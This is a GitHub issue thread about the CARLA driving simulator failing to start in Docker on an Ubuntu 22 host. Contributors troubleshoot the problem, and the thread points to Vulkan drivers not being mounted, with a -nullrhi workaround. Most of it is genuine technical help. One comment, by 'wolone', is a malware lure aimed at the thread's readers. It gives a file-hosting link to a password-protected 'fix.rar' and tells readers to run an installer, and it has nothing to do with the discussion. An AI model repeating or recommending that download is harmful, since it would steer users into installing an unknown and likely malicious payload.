carla-simulator/carla #8079: Carla not starting

Mariusmarten, 2024-08-26:
CARLA version: tested using docker version carlasim/carla:0.9.14 and carlasim/carla:0.9.15
Platform/OS: docker (running Ubuntu 18 within the container and 22 on the host system)
Problem you have experienced: Carla is not starting up. Starting up works on other gpu instance and when using -nullrhi flag for repressing gpu support). 
What you expected to happen: to start up normally
Steps to reproduce: I followed the steps described here: https://carla.readthedocs.io/en/latest/build_docker/. I pulled an image, built the image, and ran it.
Other info: problems might be due to a recent migration from Ubuntu 18 to 22. I, however, have no influence over this versioning so need to work with 22. Cuda version on host is Driver Version: 550.90.07 and CUDA Version: 12.4. 

Questions: Since the version is 9.12+, does Vulkan still need to be accessible from within the container? 

Potentially related: 
[CarlaUE4.sh cannot launch](https://github.com/carla-simulator/carla/issues/8029)

BBArikL, 2024-08-26:
Try creating a /home directory inside the docker container. I think I had the same issue and doing that fixed it for me.

Mariusmarten, 2024-08-26:
@BBArikL, thank you for the quick response. Did you maybe use a different container setup? In the default Carla containers, the home directory is reserved for the CarlaUE4, containing, e.g., the binaries `/home/carla/CarlaUE4/Binaries/Linux`, so they are created during the build.

BBArikL, 2024-08-26:
My bad, you are right. Even if the xdg-user-dirs failure it is a red herring (#3514 , #4193), it does help to install it to get that issue out of the way to properly diagnose why it isn't working. But yes, Carla switched from opengl to vulkan in the latest versions. Personally, I used a NVIDIA RTX3070 not long ago with the same docker build, and had to go trough some hoops to get it working properly, but I did not have to mess with vulkan drivers. Also what command are you using to start the docker container? The exact one that is provided in the docs?

wolone, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

Mariusmarten, 2024-08-27:
Yes, the xdg-user-dirs is not the problem here. 

Since I am using 9.14 (or 9.15) I thought no additional steps are needed:
> Starting from version 0.9.12, CARLA runs on Unreal Engine 4.26 which introduced support for off-screen rendering. In previous versions of CARLA, off-screen rendering depended upon the graphics API you were using.

I execute the CarlaUE4-Linux-Shipping binary directly instead of opening it via the CarlaUE4.sh. When using this command: `/home/carla/CarlaUE4/Binaries/Linux/CarlaUE4-Linux-Shipping CarlaUE4  -nullrhi -prefernvidia -RenderOffScreen ` Carla runs  'normally' but without any graphics.

[image]

The problem thus seems to be related to the Vulkan drivers not being properly mounted.

closed 2025-02-19 by Blyron